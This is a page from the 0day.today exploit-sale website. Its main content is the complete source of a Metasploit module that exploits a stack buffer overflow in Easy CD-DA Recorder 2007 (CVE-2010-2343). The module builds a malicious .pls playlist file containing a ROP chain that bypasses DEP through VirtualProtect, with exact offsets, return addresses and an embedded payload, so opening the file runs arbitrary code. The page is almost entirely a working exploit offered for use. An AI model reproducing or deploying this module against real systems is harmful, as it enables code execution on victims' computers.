0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Easy CD-DA Recorder PLS Buffer Overflow Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .PLS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'chap0', # Vulnerability discovery and original exploit
'Gabor Seljan', # Metasploit module
'juan vazquez' # Improved reliability
],
'References' =>
[
[ 'BID', '40631' ],
[ 'EDB', '13761' ],
[ 'OSVDB', '65256' ],
[ 'CVE', '2010-2343' ],
[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2454,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
},
'Targets' =>
[
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 7 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
],
self.class)
end
def nops
return make_nops(4).unpack("V").first
end
def rop_nops(n = 1)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack('V') * n
end
def exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
[
0x1007261e, # POP EDX # RETN [audconv.dll]
0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]
0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]
0x1005d288, # POP EBP # RETN [audconv.dll]
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
0x1005cc2d, # POP EBX # RETN [audconv.dll]
0x00000996, # 0x00000996-> EBX
0x1008740c, # POP EDX # RETN [audconv.dll]
0x00000040, # 0x00000040-> EDX
0x1001826d, # POP ECX # RETN [audconv.dll]
0x004364c6, # &Writable location [easycdda.exe]
0x00404aa9, # POP EDI # RETN [easycdda.exe]
0x100378e6, # RETN (ROP NOP) [audconv.dll]
0x0042527d, # POP EAX # RETN [easycdda.exe]
nops,
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
# 0day.today [2024-11-15] #